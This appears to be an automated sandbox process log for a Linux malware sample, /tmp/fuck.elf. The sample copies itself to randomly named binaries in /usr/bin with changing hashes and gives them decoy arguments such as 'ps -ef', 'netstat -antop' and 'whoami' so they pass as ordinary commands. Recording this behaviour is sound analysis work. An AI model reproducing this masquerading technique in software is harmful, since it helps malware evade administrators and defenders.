Path:	/usr/bin/zkleyiegjf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	f6b5753a34aff292e6ecb9853b898493

Start time:	23:39:51
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:51
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:51
Start date:	21/09/2022
Path:	/usr/bin/zkleyiegjf
Arguments:	/usr/bin/zkleyiegjf su 6236
File size:	625718 bytes
MD5 hash:	f6b5753a34aff292e6ecb9853b898493

Start time:	23:39:51
Start date:	21/09/2022
Path:	/usr/bin/zkleyiegjf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	f6b5753a34aff292e6ecb9853b898493

Start time:	23:39:51
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:51
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:51
Start date:	21/09/2022
Path:	/usr/bin/zkleyiegjf
Arguments:	/usr/bin/zkleyiegjf "cat resolv.conf" 6236
File size:	625718 bytes
MD5 hash:	f6b5753a34aff292e6ecb9853b898493

Start time:	23:39:51
Start date:	21/09/2022
Path:	/usr/bin/zkleyiegjf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	f6b5753a34aff292e6ecb9853b898493

Start time:	23:39:51
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:51
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:51
Start date:	21/09/2022
Path:	/usr/bin/zkleyiegjf
Arguments:	/usr/bin/zkleyiegjf "echo \"find\"" 6236
File size:	625718 bytes
MD5 hash:	f6b5753a34aff292e6ecb9853b898493

Start time:	23:39:52
Start date:	21/09/2022
Path:	/usr/bin/zkleyiegjf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	f6b5753a34aff292e6ecb9853b898493

Start time:	23:39:51
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:51
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:51
Start date:	21/09/2022
Path:	/usr/bin/zkleyiegjf
Arguments:	/usr/bin/zkleyiegjf "netstat -antop" 6236
File size:	625718 bytes
MD5 hash:	f6b5753a34aff292e6ecb9853b898493

Start time:	23:39:52
Start date:	21/09/2022
Path:	/usr/bin/zkleyiegjf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	f6b5753a34aff292e6ecb9853b898493

Start time:	23:39:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:57
Start date:	21/09/2022
Path:	/usr/bin/xocmdvejxu
Arguments:	/usr/bin/xocmdvejxu "sleep 1" 6236
File size:	625718 bytes
MD5 hash:	6d859ddf2b3dd9e23e5c6a3ae4ecfbff

Start time:	23:39:57
Start date:	21/09/2022
Path:	/usr/bin/xocmdvejxu
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	6d859ddf2b3dd9e23e5c6a3ae4ecfbff

Start time:	23:39:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:57
Start date:	21/09/2022
Path:	/usr/bin/xocmdvejxu
Arguments:	/usr/bin/xocmdvejxu pwd 6236
File size:	625718 bytes
MD5 hash:	6d859ddf2b3dd9e23e5c6a3ae4ecfbff

Start time:	23:39:57
Start date:	21/09/2022
Path:	/usr/bin/xocmdvejxu
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	6d859ddf2b3dd9e23e5c6a3ae4ecfbff

Start time:	23:39:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:57
Start date:	21/09/2022
Path:	/usr/bin/xocmdvejxu
Arguments:	/usr/bin/xocmdvejxu "ls -la" 6236
File size:	625718 bytes
MD5 hash:	6d859ddf2b3dd9e23e5c6a3ae4ecfbff

Start time:	23:39:57
Start date:	21/09/2022
Path:	/usr/bin/xocmdvejxu
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	6d859ddf2b3dd9e23e5c6a3ae4ecfbff

Start time:	23:39:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:57
Start date:	21/09/2022
Path:	/usr/bin/xocmdvejxu
Arguments:	/usr/bin/xocmdvejxu sh 6236
File size:	625718 bytes
MD5 hash:	6d859ddf2b3dd9e23e5c6a3ae4ecfbff

Start time:	23:39:57
Start date:	21/09/2022
Path:	/usr/bin/xocmdvejxu
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	6d859ddf2b3dd9e23e5c6a3ae4ecfbff

Start time:	23:39:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:57
Start date:	21/09/2022
Path:	/usr/bin/xocmdvejxu
Arguments:	/usr/bin/xocmdvejxu whoami 6236
File size:	625718 bytes
MD5 hash:	6d859ddf2b3dd9e23e5c6a3ae4ecfbff

Start time:	23:39:57
Start date:	21/09/2022
Path:	/usr/bin/xocmdvejxu
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	6d859ddf2b3dd9e23e5c6a3ae4ecfbff

Start time:	23:40:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:03
Start date:	21/09/2022
Path:	/usr/bin/wjnxqdxblo
Arguments:	/usr/bin/wjnxqdxblo "cat resolv.conf" 6236
File size:	625718 bytes
MD5 hash:	df30f28270f8c66ac8e73c3febe841cd

Start time:	23:40:03
Start date:	21/09/2022
Path:	/usr/bin/wjnxqdxblo
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	df30f28270f8c66ac8e73c3febe841cd

Start time:	23:40:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:03
Start date:	21/09/2022
Path:	/usr/bin/wjnxqdxblo
Arguments:	/usr/bin/wjnxqdxblo bash 6236
File size:	625718 bytes
MD5 hash:	df30f28270f8c66ac8e73c3febe841cd

Start time:	23:40:03
Start date:	21/09/2022
Path:	/usr/bin/wjnxqdxblo
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	df30f28270f8c66ac8e73c3febe841cd

Start time:	23:40:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:03
Start date:	21/09/2022
Path:	/usr/bin/wjnxqdxblo
Arguments:	/usr/bin/wjnxqdxblo "netstat -antop" 6236
File size:	625718 bytes
MD5 hash:	df30f28270f8c66ac8e73c3febe841cd

Start time:	23:40:03
Start date:	21/09/2022
Path:	/usr/bin/wjnxqdxblo
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	df30f28270f8c66ac8e73c3febe841cd

Start time:	23:40:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:03
Start date:	21/09/2022
Path:	/usr/bin/wjnxqdxblo
Arguments:	/usr/bin/wjnxqdxblo "grep \"A\"" 6236
File size:	625718 bytes
MD5 hash:	df30f28270f8c66ac8e73c3febe841cd

Start time:	23:40:03
Start date:	21/09/2022
Path:	/usr/bin/wjnxqdxblo
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	df30f28270f8c66ac8e73c3febe841cd

Start time:	23:40:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:03
Start date:	21/09/2022
Path:	/usr/bin/wjnxqdxblo
Arguments:	/usr/bin/wjnxqdxblo top 6236
File size:	625718 bytes
MD5 hash:	df30f28270f8c66ac8e73c3febe841cd

Start time:	23:40:03
Start date:	21/09/2022
Path:	/usr/bin/wjnxqdxblo
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	df30f28270f8c66ac8e73c3febe841cd

Start time:	23:40:09
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:09
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:09
Start date:	21/09/2022
Path:	/usr/bin/oklqvchkds
Arguments:	/usr/bin/oklqvchkds pwd 6236
File size:	625718 bytes
MD5 hash:	56eb989faec3c2ab2a2afbaec7ea40eb

Start time:	23:40:09
Start date:	21/09/2022
Path:	/usr/bin/oklqvchkds
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	56eb989faec3c2ab2a2afbaec7ea40eb

Start time:	23:40:09
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:09
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:09
Start date:	21/09/2022
Path:	/usr/bin/oklqvchkds
Arguments:	/usr/bin/oklqvchkds "route -n" 6236
File size:	625718 bytes
MD5 hash:	56eb989faec3c2ab2a2afbaec7ea40eb

Start time:	23:40:09
Start date:	21/09/2022
Path:	/usr/bin/oklqvchkds
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	56eb989faec3c2ab2a2afbaec7ea40eb

Start time:	23:40:09
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:09
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:09
Start date:	21/09/2022
Path:	/usr/bin/oklqvchkds
Arguments:	/usr/bin/oklqvchkds whoami 6236
File size:	625718 bytes
MD5 hash:	56eb989faec3c2ab2a2afbaec7ea40eb

Start time:	23:40:09
Start date:	21/09/2022
Path:	/usr/bin/oklqvchkds
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	56eb989faec3c2ab2a2afbaec7ea40eb

Start time:	23:40:09
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:09
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:09
Start date:	21/09/2022
Path:	/usr/bin/oklqvchkds
Arguments:	/usr/bin/oklqvchkds ls 6236
File size:	625718 bytes
MD5 hash:	56eb989faec3c2ab2a2afbaec7ea40eb

Start time:	23:40:09
Start date:	21/09/2022
Path:	/usr/bin/oklqvchkds
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	56eb989faec3c2ab2a2afbaec7ea40eb

Start time:	23:40:09
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:09
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:09
Start date:	21/09/2022
Path:	/usr/bin/oklqvchkds
Arguments:	/usr/bin/oklqvchkds pwd 6236
File size:	625718 bytes
MD5 hash:	56eb989faec3c2ab2a2afbaec7ea40eb

Start time:	23:40:10
Start date:	21/09/2022
Path:	/usr/bin/oklqvchkds
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	56eb989faec3c2ab2a2afbaec7ea40eb

Start time:	23:40:15
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:15
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:15
Start date:	21/09/2022
Path:	/usr/bin/axppigwavk
Arguments:	/usr/bin/axppigwavk su 6236
File size:	625718 bytes
MD5 hash:	0b94411d21ccce661e8cdaa0383ff15f

Start time:	23:40:15
Start date:	21/09/2022
Path:	/usr/bin/axppigwavk
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	0b94411d21ccce661e8cdaa0383ff15f

Start time:	23:40:15
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:15
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:15
Start date:	21/09/2022
Path:	/usr/bin/axppigwavk
Arguments:	/usr/bin/axppigwavk "cat resolv.conf" 6236
File size:	625718 bytes
MD5 hash:	0b94411d21ccce661e8cdaa0383ff15f

Start time:	23:40:15
Start date:	21/09/2022
Path:	/usr/bin/axppigwavk
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	0b94411d21ccce661e8cdaa0383ff15f

Start time:	23:40:15
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:15
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:15
Start date:	21/09/2022
Path:	/usr/bin/axppigwavk
Arguments:	/usr/bin/axppigwavk "route -n" 6236
File size:	625718 bytes
MD5 hash:	0b94411d21ccce661e8cdaa0383ff15f

Start time:	23:40:15
Start date:	21/09/2022
Path:	/usr/bin/axppigwavk
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	0b94411d21ccce661e8cdaa0383ff15f

Start time:	23:40:15
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:15
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:15
Start date:	21/09/2022
Path:	/usr/bin/axppigwavk
Arguments:	/usr/bin/axppigwavk "ifconfig eth0" 6236
File size:	625718 bytes
MD5 hash:	0b94411d21ccce661e8cdaa0383ff15f

Start time:	23:40:16
Start date:	21/09/2022
Path:	/usr/bin/axppigwavk
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	0b94411d21ccce661e8cdaa0383ff15f

Start time:	23:40:15
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:15
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:16
Start date:	21/09/2022
Path:	/usr/bin/axppigwavk
Arguments:	/usr/bin/axppigwavk "echo \"find\"" 6236
File size:	625718 bytes
MD5 hash:	0b94411d21ccce661e8cdaa0383ff15f

Start time:	23:40:16
Start date:	21/09/2022
Path:	/usr/bin/axppigwavk
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	0b94411d21ccce661e8cdaa0383ff15f

Start time:	23:40:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:21
Start date:	21/09/2022
Path:	/usr/bin/ujuhiugmmi
Arguments:	/usr/bin/ujuhiugmmi "ps -ef" 6236
File size:	625718 bytes
MD5 hash:	3bf5a8180c278833dc913e174de19ba4

Start time:	23:40:21
Start date:	21/09/2022
Path:	/usr/bin/ujuhiugmmi
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	3bf5a8180c278833dc913e174de19ba4

Start time:	23:40:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:21
Start date:	21/09/2022
Path:	/usr/bin/ujuhiugmmi
Arguments:	/usr/bin/ujuhiugmmi "ls -la" 6236
File size:	625718 bytes
MD5 hash:	3bf5a8180c278833dc913e174de19ba4

Start time:	23:40:21
Start date:	21/09/2022
Path:	/usr/bin/ujuhiugmmi
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	3bf5a8180c278833dc913e174de19ba4

Start time:	23:40:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:21
Start date:	21/09/2022
Path:	/usr/bin/ujuhiugmmi
Arguments:	/usr/bin/ujuhiugmmi whoami 6236
File size:	625718 bytes
MD5 hash:	3bf5a8180c278833dc913e174de19ba4

Start time:	23:40:21
Start date:	21/09/2022
Path:	/usr/bin/ujuhiugmmi
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	3bf5a8180c278833dc913e174de19ba4

Start time:	23:40:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:21
Start date:	21/09/2022
Path:	/usr/bin/ujuhiugmmi
Arguments:	/usr/bin/ujuhiugmmi "ps -ef" 6236
File size:	625718 bytes
MD5 hash:	3bf5a8180c278833dc913e174de19ba4

Start time:	23:40:21
Start date:	21/09/2022
Path:	/usr/bin/ujuhiugmmi
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	3bf5a8180c278833dc913e174de19ba4

Start time:	23:40:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:21
Start date:	21/09/2022
Path:	/usr/bin/ujuhiugmmi
Arguments:	/usr/bin/ujuhiugmmi ifconfig 6236
File size:	625718 bytes
MD5 hash:	3bf5a8180c278833dc913e174de19ba4

Start time:	23:40:21
Start date:	21/09/2022
Path:	/usr/bin/ujuhiugmmi
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	3bf5a8180c278833dc913e174de19ba4

Start time:	23:40:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:27
Start date:	21/09/2022
Path:	/usr/bin/xodlvzjoas
Arguments:	/usr/bin/xodlvzjoas who 6236
File size:	625718 bytes
MD5 hash:	dfd3d04bbf2779fabbef0fec22258c2e

Start time:	23:40:27
Start date:	21/09/2022
Path:	/usr/bin/xodlvzjoas
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	dfd3d04bbf2779fabbef0fec22258c2e

Start time:	23:40:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:27
Start date:	21/09/2022
Path:	/usr/bin/xodlvzjoas
Arguments:	/usr/bin/xodlvzjoas whoami 6236
File size:	625718 bytes
MD5 hash:	dfd3d04bbf2779fabbef0fec22258c2e

Start time:	23:40:27
Start date:	21/09/2022
Path:	/usr/bin/xodlvzjoas
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	dfd3d04bbf2779fabbef0fec22258c2e

Start time:	23:40:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:27
Start date:	21/09/2022
Path:	/usr/bin/xodlvzjoas
Arguments:	/usr/bin/xodlvzjoas uptime 6236
File size:	625718 bytes
MD5 hash:	dfd3d04bbf2779fabbef0fec22258c2e

Start time:	23:40:27
Start date:	21/09/2022
Path:	/usr/bin/xodlvzjoas
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	dfd3d04bbf2779fabbef0fec22258c2e

Start time:	23:40:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:27
Start date:	21/09/2022
Path:	/usr/bin/xodlvzjoas
Arguments:	/usr/bin/xodlvzjoas uptime 6236
File size:	625718 bytes
MD5 hash:	dfd3d04bbf2779fabbef0fec22258c2e

Start time:	23:40:27
Start date:	21/09/2022
Path:	/usr/bin/xodlvzjoas
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	dfd3d04bbf2779fabbef0fec22258c2e

Start time:	23:40:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:27
Start date:	21/09/2022
Path:	/usr/bin/xodlvzjoas
Arguments:	/usr/bin/xodlvzjoas "ls -la" 6236
File size:	625718 bytes
MD5 hash:	dfd3d04bbf2779fabbef0fec22258c2e

Start time:	23:40:28
Start date:	21/09/2022
Path:	/usr/bin/xodlvzjoas
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	dfd3d04bbf2779fabbef0fec22258c2e

Start time:	23:40:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:33
Start date:	21/09/2022
Path:	/usr/bin/jflhtagbsg
Arguments:	/usr/bin/jflhtagbsg "ls -la" 6236
File size:	625718 bytes
MD5 hash:	3d4268e4b1640cd06adef2fd8e500b35

Start time:	23:40:33
Start date:	21/09/2022
Path:	/usr/bin/jflhtagbsg
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	3d4268e4b1640cd06adef2fd8e500b35

Start time:	23:40:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:33
Start date:	21/09/2022
Path:	/usr/bin/jflhtagbsg
Arguments:	/usr/bin/jflhtagbsg "sleep 1" 6236
File size:	625718 bytes
MD5 hash:	3d4268e4b1640cd06adef2fd8e500b35

Start time:	23:40:33
Start date:	21/09/2022
Path:	/usr/bin/jflhtagbsg
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	3d4268e4b1640cd06adef2fd8e500b35

Start time:	23:40:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:33
Start date:	21/09/2022
Path:	/usr/bin/jflhtagbsg
Arguments:	/usr/bin/jflhtagbsg "netstat -an" 6236
File size:	625718 bytes
MD5 hash:	3d4268e4b1640cd06adef2fd8e500b35

Start time:	23:40:33
Start date:	21/09/2022
Path:	/usr/bin/jflhtagbsg
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	3d4268e4b1640cd06adef2fd8e500b35

Start time:	23:40:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:33
Start date:	21/09/2022
Path:	/usr/bin/jflhtagbsg
Arguments:	/usr/bin/jflhtagbsg sh 6236
File size:	625718 bytes
MD5 hash:	3d4268e4b1640cd06adef2fd8e500b35

Start time:	23:40:33
Start date:	21/09/2022
Path:	/usr/bin/jflhtagbsg
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	3d4268e4b1640cd06adef2fd8e500b35

Start time:	23:40:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
